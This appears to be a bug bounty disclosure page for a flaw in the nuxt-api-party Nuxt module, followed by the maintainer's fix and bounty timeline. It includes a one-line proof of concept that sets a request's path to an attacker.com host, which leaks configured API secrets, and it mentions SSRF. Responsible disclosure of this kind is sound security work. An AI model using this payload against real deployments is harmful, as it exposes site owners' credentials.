Leak Secret tokens by changing baseURL in johannschopplich/nuxt-api-party


Reported on

Jun 15th 2023


nuxt-api-party allows developers to easily hook up APIs. You can configure API URLs and Credentials to be sent on requests.

It is suggested in the documentation that this plugin is capable of handling sensitive data.

There is a design flaw that could allow an attacker to extract private API keys.

Proof of Concept

Send a request to /api/__api_party/yourendpoint with the body:

   "path": "https://attacker.com"

Sensitive data will be leaked to the attacker site.

This is also possible by using the runtime endpoint change feature.

SSRF is also possible, this could have further impact.


Leaking secret API keys.



ofetch will permit http:// paths.

We are processing your report and will contact the johannschopplich/nuxt-api-party team within 24 hours. 3 months ago
We created a GitHub Issue asking the maintainers to create a SECURITY.md 3 months ago
We have contacted a member of the johannschopplich/nuxt-api-party team and are waiting to hear back 3 months ago
3 months ago


Hey there! Thank you very much for the security report. I have prepared a fix for both issues. Waiting on the release of the fix by you link it in my documentation. Is this the best way to proceed?

Thanks again, really happy you found this.

3 months ago


Hey, happy to review any fixes, where can I find them?

Johann Schopplich validated this vulnerability 3 months ago

Hey there, I have created a branch with the fixes: https://github.com/johannschopplich/nuxt-api-party/tree/fix/tokens-leak I want to push a release in the coming days and add publish the security issue,

OhB00 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Johann Schopplich marked this as fixed in 0.13.0 with commit 481872 3 months ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
Johann Schopplich published this vulnerability 3 months ago
server.ts#L37 has been validated
Johann Schopplich gave praise 3 months ago
Thank you again for reporting this vulnerability! This was my first vulnerability via a bounty hunting program. I'm glad it exists.
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
3 months ago


Fix looks good!

to join this conversation